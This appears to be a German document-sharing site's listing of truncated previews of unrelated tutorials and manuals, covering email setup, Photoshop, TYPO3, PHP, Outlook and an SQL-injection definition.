Ihr Name: Datum: ALLGEMEINES WISSEN 1. Im Assessment Center sind folgende Eigenschaften wichtig: a. Durchsetzungskraft b. Mein IQ c. Professionelle Argumentation, sicheres Auftreten 2. Mein Wissen wird
MehrObjektorientierte Programmierung für Anfänger am Beispiel PHP
Objektorientierte Programmierung für Anfänger am Beispiel PHP Johannes Mittendorfer http://jmittendorfer.hostingsociety.com 19. August 2012 Abstract Dieses Dokument soll die Vorteile der objektorientierten
MehrAnleitung. Verschieben des alten E-Mail-Postfachs (z.b. unter Thunderbird) in den neuen Open Xchange-Account
Anleitung Verschieben des alten E-Mail-Postfachs (z.b. unter Thunderbird) in den neuen Open Xchange-Account Am Dienstag, den 25.03.2014 werden alle E-Mail-Accounts vom alten auf den neuen E-Mail-Server
MehrAdobe Photoshop CS2, CS3, CS4, CS5 mit Auto-SoftProof-Ansicht
Typischerweise belässt und bearbeitet man digitale Bilder im RGB-Farbmodus, auch wenn das Hauptausgabeziel ein CMYK- Farbraum ist. Um eine farbliche Kontrolle des Ergebnisses während der Bearbeitung zu
MehrWie man Registrationen und Styles von Style/Registration Floppy Disketten auf die TYROS-Festplatte kopieren kann.
Wie man Registrationen und Styles von Style/Registration Floppy Disketten auf die TYROS-Festplatte kopieren kann. Einleitung Es kommt vor, dass im Handel Disketten angeboten werden, die Styles und Registrationen
MehrFlashfragen in ILIAS Test & Assessment. Helmut Schottmüller
Flashfragen in ILIAS Test & Assessment Helmut Schottmüller Flashfragen in ILIAS Test & Assessment Helmut Schottmüller Veröffentlicht Januar 2009 Copyright 2009 Helmut Schottmüller Inhaltsverzeichnis 1.
MehrGITS Steckbriefe 1.9 - Tutorial
Allgemeines Die Steckbriefkomponente basiert auf der CONTACTS XTD Komponente von Kurt Banfi, welche erheblich modifiziert bzw. angepasst wurde. Zuerst war nur eine kleine Änderung der Komponente für ein
MehrEchoLink und Windows XP SP2
EchoLink und Windows XP SP2 Hintergrund Für Computer auf denen Windows XP läuft, bietet Microsoft seit kurzem einen Update, in der Form des Service Pack 2 oder auch SP2 genannt, an. SP2 hat einige neue
MehrAutoTexte und AutoKorrektur unter Outlook verwenden
AutoTexte und AutoKorrektur unter Outlook verwenden Die Hilfsmittel "AutoKorrektur" und "AutoTexte", die schon unter Microsoft Word das Arbeiten erleichtern, sind natürlich auch unter Outlook verfügbar.
MehrWebalizer HOWTO. Stand: 18.06.2012
Webalizer HOWTO Stand: 18.06.2012 Copyright 2003 by manitu. Alle Rechte vorbehalten. Alle verwendeten Bezeichnungen dienen lediglich der Kennzeichnung und können z.t. eingetragene Warenzeichen sein, ohne
MehrSo geht s Schritt-für-Schritt-Anleitung
So geht s Schritt-für-Schritt-Anleitung Software WISO Mein Verein Thema Fällige Rechnungen erzeugen und Verbuchung der Zahlungen (Beitragslauf) Version/Datum V 15.00.06.100 Zuerst sind die Voraussetzungen
MehrVersetzungsgefahr als ultimative Chance. ein vortrag für versetzungsgefährdete
Versetzungsgefahr als ultimative Chance ein vortrag für versetzungsgefährdete Versetzungsgefährdete haben zum Großteil einige Fallen, die ihnen das normale Lernen schwer machen und mit der Zeit ins Hintertreffen
MehrMenü Macro. WinIBW2-Macros unter Windows7? Macros aufnehmen
Menü Macro WinIBW2-Macros unter Windows7?... 1 Macros aufnehmen... 1 Menübefehle und Schaltflächen in Macros verwenden... 4 Macros bearbeiten... 4 Macros löschen... 5 Macro-Dateien... 5 Macros importieren...
Mehr1. Aktionen-Palette durch "Fenster /Aktionen ALT+F9" öffnen. 2. Anlegen eines neuen Set über "Neues Set..." (über das kleine Dreieck zu erreichen)
Tipp: Aktionen (c) 2005 Thomas Stölting, Stand: 25.4. 2005 In Photoshop werden häufig immer wieder die gleichen Befehlssequenzen benötigt. Um sie nicht jedesmal manuell neu eingeben zu müssen, können diese
MehrTYPO3 Tipps und Tricks
TYPO3 Tipps und Tricks Seiten als Shortcut. Hiermit ist gemeint, dass eine Oberseite direkt auf eine tiefere Unterseite verlinkt. Dies kann bei Themen ohne gesonderte Übersichtsseite hilfreich sein. Zum
MehrSpeicher in der Cloud
Speicher in der Cloud Kostenbremse, Sicherheitsrisiko oder Basis für die unternehmensweite Kollaboration? von Cornelius Höchel-Winter 2013 ComConsult Research GmbH, Aachen 3 SYNCHRONISATION TEUFELSZEUG
Mehrteamsync Kurzanleitung
1 teamsync Kurzanleitung Version 4.0-19. November 2012 2 1 Einleitung Mit teamsync können Sie die Produkte teamspace und projectfacts mit Microsoft Outlook synchronisieren.laden Sie sich teamsync hier
MehrBedienungsanleitung Anlassteilnehmer (Vereinslisten)
Bedienungsanleitung Anlassteilnehmer Dieses Programm ist speziell für Vereine entworfen. Es ist lizenzfrei verwendbar und gratis. Das Programm ist mit Excel 2010 erstellt worden und enthält VBA Programmierungen,
MehrSQL-Injection. Seite 1 / 16
SQL-Injection Seite 1 / 16 Allgemein: SQL (Structured Query Language) Datenbanksprache zur Definition von Datenstrukturen in Datenbanken Bearbeiten und Abfragen von Datensätzen Definition: SQL-Injection
MehrTragen Sie bitte im Anmeldefeld die Daten ein, die Sie von uns erhalten haben.
Online Katalog der Bildstelle Peine: http://nds-pe.datenbank-bildungsmedien.net/ Anmeldung: Klicken Sie bitte auf ganz rechts. Tragen Sie bitte im Anmeldefeld die Daten ein, die Sie von uns erhalten haben.
MehrEinfügen von Bildern innerhalb eines Beitrages
Version 1.2 Einfügen von Bildern innerhalb eines Beitrages Um eigene Bilder ins Forum einzufügen, gibt es zwei Möglichkeiten. 1.) Ein Bild vom eigenem PC wird auf den Webspace von Baue-die-Bismarck.de
MehrAus unserer Projekt- und Schulungserfahrung www.orionserver.com Oracle TechNet
Betrifft: Autor: Art der Info: Quelle: OC4J Rotate Access-Logs und LogFormat Dirk Nachbar Technische Background Info Aus unserer Projekt- und Schulungserfahrung www.orionserver.com Oracle TechNet Einleitung
MehrLeitfaden für den E-Mail-Dienst
Leitfaden für den E-Mail-Dienst In diesem Leitfaden finden Sie Hilfestellungen, wie Sie den durch ML Websites bereitgestellten E-Mail-Dienst in Anspruch nehmen können. So richten Sie Ihr E-Mail-Postfach
MehrStundenerfassung Version 1.8 Anleitung Arbeiten mit Replikaten
Stundenerfassung Version 1.8 Anleitung Arbeiten mit Replikaten 2008 netcadservice GmbH netcadservice GmbH Augustinerstraße 3 D-83395 Freilassing Dieses Programm ist urheberrechtlich geschützt. Eine Weitergabe
MehrEinrichten eines POP-Mailkontos unter Thunderbird Mail DE:
Einrichten eines POP-Mailkontos unter Thunderbird Mail DE: Ein E-Mail-Konto können Sie am einfachsten über den integrierten Assistenten einrichten. Dieser führt Sie Schritt für Schritt durch alle Einstellungsmöglichkeiten
MehrImport und Export von Übergängern
Import und Export von Übergängern SibankPLUS bietet Ihnen eine komfortable Schnittstelle, um den Wechsel der Schüler nach der Stufe 4 von der Grundschule auf eine weiterführende Schule zu verarbeiten.
MehrZAHLUNGSAVIS. Im Zahlungsprogrammteil automatisch erstellen
DIBU GS/XP Finanzbuchhaltung Erweiterung ZAHLUNGSAVIS Im Zahlungsprogrammteil automatisch erstellen Seite - 1 - von 8 Seite(n) Stand März 2005-03-28 Technische Hinweise: Geänderte Programme FIZAHL1, FIZAHL2,
MehrInternationales Altkatholisches Laienforum
Internationales Altkatholisches Laienforum Schritt für Schritt Anleitung für die Einrichtung eines Accounts auf admin.laienforum.info Hier erklären wir, wie ein Account im registrierten Bereich eingerichtet
MehrArbeiten mit UMLed und Delphi
Arbeiten mit UMLed und Delphi Diese Anleitung soll zeigen, wie man Klassen mit dem UML ( Unified Modeling Language ) Editor UMLed erstellt, in Delphi exportiert und dort so einbindet, dass diese (bis auf
MehrAktivierung von Makros in den Erfassungshilfen
Aktivierung von Makros in den Erfassungshilfen Für die Nutzung unserer Microsoft Excel und OpenOffice Erfassungshilfen ist es erforderlich, die Makros zu aktivieren. Diese sorgen dafür, dass sich neue
MehrContent Management System (CMS) Manual
Content Management System (CMS) Manual Thema Seite Aufrufen des Content Management Systems (CMS) 2 Funktionen des CMS 3 Die Seitenverwaltung 4 Seite ändern/ Seite löschen Seiten hinzufügen 5 Seiten-Editor
MehrLineargleichungssysteme: Additions-/ Subtraktionsverfahren
Lineargleichungssysteme: Additions-/ Subtraktionsverfahren W. Kippels 22. Februar 2014 Inhaltsverzeichnis 1 Einleitung 2 2 Lineargleichungssysteme zweiten Grades 2 3 Lineargleichungssysteme höheren als
MehrRegistrierung für eine Senioren IPIN www.itftennis.com/ipin. Ab 17. Mai 2011 können sich Spieler für eine Senioren IPIN (Lizenz) registrieren.
Registrierung für eine Senioren IPIN www.itftennis.com/ipin Ab 17. Mai 2011 können sich Spieler für eine Senioren IPIN (Lizenz) registrieren. Um ab 2012 an den Turnieren des ITF Seniors Circuits teilnehmen
MehrHosted.Exchange. Konfigurationsanleitung Outlook 2007
Hosted.Exchange Konfigurationsanleitung Outlook 2007 Inhalt 1. Konfiguration Hosted Exchange... 3 2. Nutzung Infotech Hosted Exchange Webmail... 7 2.1 Einstieg... 7 2.2 Kennwort ändern... 8 3. Spamfilter
MehrGruppenrichtlinien und Softwareverteilung
Gruppenrichtlinien und Softwareverteilung Ergänzungen zur Musterlösung Bitte lesen Sie zuerst die gesamte Anleitung durch! Vorbemerkung: Die Begriffe OU (Organizational Unit) und Raum werden in der folgenden
MehrKSN-WEBMAIL-BASICS. November 2008. Grundlagen zum Thema Webmail TEIL A. Benutzen von Webmail
Seite1 KSN-WEBMAIL-BASICS Grundlagen zum Thema Webmail TEIL A Benutzen von Webmail WebMail bezeichnet eine Methode E-Mail direkt mit dem Web-Browser nach Eingabe von Benutzername und Kennwort zu lesen
Mehr